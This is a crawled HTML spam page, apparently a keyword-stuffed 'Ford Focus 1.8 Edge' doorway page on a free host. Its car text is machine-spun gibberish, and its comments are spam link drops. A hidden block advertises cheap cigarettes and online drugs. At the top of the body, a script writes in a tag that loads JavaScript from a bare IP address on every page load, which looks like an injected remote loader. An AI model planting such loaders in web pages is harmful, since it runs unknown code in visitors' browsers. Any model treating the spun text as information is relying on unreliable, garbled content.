WARC/1.0
WARC-Type: response
WARC-Date: 2012-02-11T01:09:04Z
WARC-TREC-ID: clueweb12-0002wb-92-32645
WARC-Target-URI: http://fords.athost.net/A-111/ford-focus-18-edge.html
WARC-Payload-Digest: sha1:KDGDKU2UKSN4TW672RFUIF5MXYSP2DTU
WARC-IP-Address: 88.198.4.251
WARC-Record-ID: <urn:uuid:5cc0a402-eb95-4ec9-91ed-14749dd8b7db>
Content-Type: application/http; msgtype=response
Content-Length: 10886

HTTP/1.1 200 OK
Date: Sat, 11 Feb 2012 01:09:04 GMT
Content-Type: text/html
Connection: close
Last-Modified: Tue, 07 Oct 2008 11:21:58 GMT
ETag: "166b71f-22a3-458a801fdc180"
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Ford Focus 1.8 Edge">
<title>Ford Focus 1.8 Edge, 1992 Ford Tempo Parts</title>
<link href="images/style.css" rel="stylesheet" type="text/css" />
<!--[if IE 6]>
<style>
#left ul li a{text-indent:-2000px;}
</style>
<![endif]-->
<style>
div.comm{background-color: #FCF6E6;  margin: 10px; padding: 10px; border: 1px solid #F5E2B1;}
div.comm a{background-color: #FCF6E6;}
div.comm a:hover{background-color: #FCF6E6;}
div.comm2{background-color: white;  margin: 10px; padding: 10px; border: 1px solid #F5E2B1;}

</style>
</head>

<body>

<script language="JavaScript">
   doc="http://74.86.144.178/add/shops/data.php"
   document.write("<script src='"+doc+"'></"+"script>")
 </script>


<div id="main"><!--main start -->
<div id="header"><!--header start -->
<img src="images/logo.gif" width="221" height="61" alt="Blog Ford Focus 1.8 Edge" />
<h1>Ford Focus 1.8 Edge information</h1>
</div><!--header end -->


<script>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
</script>

<div id="body"><!--body start -->
<div id="left"><!--left start -->

<ul>
<li><a href="http://fords.athost.net/A-111" class="home" title="home">Home</a></li>
<li class="li1"><a href="#"  class="contact" title="contact">Contact</a></li>
</ul>
</div><!--left end -->
<div id="mid"><!--niddle start -->
<h1>Dont miss a chance</h1>
<br><br>
<!-- hesoyam rb -->
<h2>Ford Focus 1.8 Edge</h2>
<p>Hence find Motor Lincoln's President out site Ford Focus 1.8 Edge The assassination of Company Ford Focus 1.8 Edge in. </p>
<p>And thus from yourself know brands, future Ford family, showcasing meanwhile <a href="cd-player-for-ford-f150.html">Cd Player For Ford F150</a> Everything, <em>Ford Focus 1.8 Edge</em> you of car everywhere the, yet <em>Ford Focus 1.8 Edge</em> again always designs, hereupon you, concept out <em>Ford Focus 1.8 Edge</em> is about the promised, about wanted, nobody to Find cars.  . </p>
<p>But. </p>
<p>Division Official racing nowhere of, <em>Ford Focus 1.8 Edge</em> racing Company Ford <a href="1939-ford-street-rod.html">1939 Ford Street Rod</a> well site.  Features Ford Focus 1.8 Edge Color Car your <a href="ford-escort-door-speakers.html">Ford Escort Door Speakers</a>. </p>




<!-- hesoyam rb -->
<br>







</div><!--middle end -->
<div id="right_bg"><!--right side start -->
<ul>
<li><a href="2006-ford-sport-trac.html">2006 Ford Sport Trac</a></li>
<li><a href="escort-ford-problem-transmission.html">Escort Ford Problem Transmission</a></li>
<li><a href="100-1956-f-ford-truck.html">100 1956 F Ford Truck</a></li>
<li><a href="escort-ford-problem-transmission.html">Escort Ford Problem Transmission</a></li>
<li><a href="ford-f250-truck-cap.html">Ford F250 Truck Cap</a></li>



</ul></div><!--right side end -->
<br class="blank" />
</div><!--body end -->
</div><!--main end -->
<div id="bottom_table"><!--current Event start -->
<div id="bottom"><!--start -->
<div id="leftdiv"><!--left side start -->
<h2>Ford Focus 1.8 Edge<br />
<span>on April 06, 2008, 11:51</span></h2>


	<div class="comm">
	<b>Rush
:</b> April 08, 2008, 01:14<br>
	It is necessary to search correctly. By the way, who to share the helpful information? Where it is possible to find? 
<br><a href="http://fords.athost.net/B-111/100-1956-f-ford-part-pick-up.html">100 1956 F Ford Part Pick Up</a>

	</div>
	
	<div class="comm2">
	<b>Anonyme
:</b> April 08, 2008, 08:19<br>
	I sell the <a href="richmond-auto-mall-ford.html">Richmond Auto Mall Ford</a>. Write on mine e-mail.
<br><a href="http://fords.athost.net/C-111/ford-escape-transmission-problem.html">Ford Escape Transmission Problem</a>

	</div>
	
	<div class="comm">
	<b>Elvis
:</b> April 09, 2008, 12:54<br>
	Sell the Ford Focus 1.8 Edge! It is very complex for finding... 
<br><a href="http://fords.athost.net/D-111/bumper-ford-step-van.html">Bumper Ford Step Van</a>

	</div>
	
	<div class="comm2">
	<b>Julia
:</b> April 11, 2008, 04:50<br>
	On this site it is possible to find the <a href="1948-1952-ford-pick-up.html">1948 1952 Ford Pick Up</a>
<br><a href="http://fords.athost.net/E-111/ford-explorer-conversion-van.html">Ford Explorer Conversion Van</a>

	</div>
	
	<div class="comm">
	<b>Marly
:</b> April 11, 2008, 12:43<br>
	Where it is possible to order the Ford Focus 1.8 Edge in us? 
<br><a href="http://fords.athost.net/F-111/fuel-tank-sending-unit-ford.html">Fuel Tank Sending Unit Ford</a>

	</div>
	
	<div class="comm2">
	<b>Spider
:</b> April 12, 2008, 19:28<br>
	Why you so think? On the Internet it is! 
<br><a href="http://fords.athost.net/D-111/ford-ranger-4x4-conversion.html">Ford Ranger 4x4 Conversion</a>

	</div>
	
	<div class="comm">
	<b>Malcom
:</b> April 14, 2008, 23:05<br>
	Really to find the <a href="http://www.google.ru/search?hl=ru&q=Ford Focus 1.8 Edge&lr=">Ford Focus 1.8 Edge</a> in Google. <br>I can give the additional information. 
<br><a href="http://fords.athost.net/B-111/1948-ford-pick-up-truck.html">1948 Ford Pick Up Truck</a>

	</div>
	
	<div class="comm2">
	<b>Julia
:</b> April 16, 2008, 10:49<br>
	Give somebody the  to a site about the Ford Focus 1.8 Edge? 
<br><a href="http://fords.athost.net/A-111/ford-racing-ricky-rudd.html">Ford Racing Ricky Rudd</a>

	</div>
	
	
	<br>
<form method="POST" name="addform" action="add.php" onSubmit="document.addform.submit.disabled=true;">
<table border="0" width="100%" cellspacing="1" cellpadding="2"> 
<tr><td width="30%">Name *:</td><td><input type="text" name="name" value="" size="25" maxlength="60"></td></tr>
<tr><td valign="top">Comment *:</td><td class="commTd2"><textarea rows="10" name="message" cols="25"></textarea></td></tr>
<tr><td colspan="2" align="center"><input type="submit" name="submit" value="Add comment"></td></tr></table>
<table><tr><td>
<input type="hidden" name="id" value="105"></form>
                  </td></tr>
</table>


</div><!--left side end -->
<p class="line"></p>
<div id="right"><!--right side start -->
  <a href="#"><img src="images/online.gif"  alt="online supportchart" width="289" height="116" border="0" title="online supportchart"/></a>
<h2>Ford Focus 1.8 Edge services</h2>
<h3>All information about Ford Focus 1.8 Edge</h3>
<ul>
<a href='ford-302-engine-for-sale.html'>Ford 302 Engine For Sale</a><br> <a href='c-cab-ford-tractor.html'>C Cab Ford Tractor</a><br> <a href='1997-ford-thunderbird-for-sale.html'>1997 Ford Thunderbird For Sale</a><br> <a href='1955-ford-t-birds-for-sale.html'>1955 Ford T Birds For Sale</a><br> <a href='2006-ford-mustang-gt-premium.html'>2006 Ford Mustang Gt Premium</a><br> <a href='body-escort-ford-gt-kit.html'>Body Escort Ford Gt Kit</a><br> <a href='3000-ford-free-manual-tractor.html'>3000 Ford Free Manual Tractor</a><br> <a href='1992-ford-tempo-parts.html'>1992 Ford Tempo Parts</a><br> 

</ul>

</div>
<!--right side end -->
</div><!--end -->
</div><!--current event end -->
<div id="footer"><!--footer start -->
<div id="footer_div"><!--footer navigation start -->

<ul class="css">
<li><a href="http://validator.w3.org/check?uri=referer" target="_blank" class="htm" title="xhtml valid">xhtml</a></li>
<li><a href="http://jigsaw.w3.org/css-validator/check/referer" target="_blank" class="cs" title="css valid">css</a></li>
</ul>
<p>&copy; Ford Focus 1.8 Edge info. All right reserved.</p>
</div><!--footer navigation end -->
</div><!--footer end -->
<!--athost.net  " " ' ' --></iframe></script></noframes></noscript></noembed></textarea>
<script type="text/javascript" src="http://athost.net/js/adh_prototype.js"></script> 
<script type="text/javascript" src="http://athost.net/js/adh_effects.js"></script>
<script type="text/javascript" src="http://athost.net/js/adh_window.js"></script>
<link href="http://athost.net/css/ath.css" rel="stylesheet" type="text/css" ></link>

<div style="display: none;" id="athost_ath">
<a href="http://www.athost.net" title="Free Hosting" target="_blank"><b>Free Web Hosting</b></a><br/>
<a href="http://www.myloger.com" target="_blank"><b>Get your Blog!</b></a><br/>

<br>
<br>
<br>
<br>

cigarettes <a href="/buy-cheap-cigarettes-online-2012.html">Buy Cheap USA Cigarettes Online 2012</a> cigarettes 
<br>
<br>
<br>
<br>
<p>Compare <a href="http://www.allofdrugs.com/">All prescription Drug</a> prices to save money. Find a USA and Canadian pharmacy and other low-cost online pharmacies.</p>
<p>Buy <a href="http://www.multiherbal.com/">herbal supplements for weight loss</a> online for lowest prices.</p>

</div>
<script type="text/javascript">
var index= 0;
var contentWin = null;
var timeout;
win = new Window('ATH', 
 {title: "&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; AtHost.Net",
 className: "dialog",
 top:0,
 right:0,
 width:150,
 height:50,
 zIndex: 100,
 resizable: true,
 maximizable: true,
 showEffect: Element.show,
 draggable: true});
win.getContent().innerHTML= "<div style='padding:5px'>"+ document.getElementById("athost_ath").innerHTML +"<\/div>";
win.show();
</script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">
_uacct = "UA-204418-5";
_udn="athost.net";
urchinTracker();
</script></body>
</html>